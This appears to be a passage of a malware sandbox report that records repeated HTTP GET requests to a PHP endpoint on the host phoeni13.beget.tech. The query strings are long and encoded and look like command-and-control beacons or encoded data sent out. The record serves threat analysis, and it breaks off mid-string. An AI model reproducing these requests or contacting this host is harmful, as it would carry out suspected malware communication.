Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXUq9UMNp2T3lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc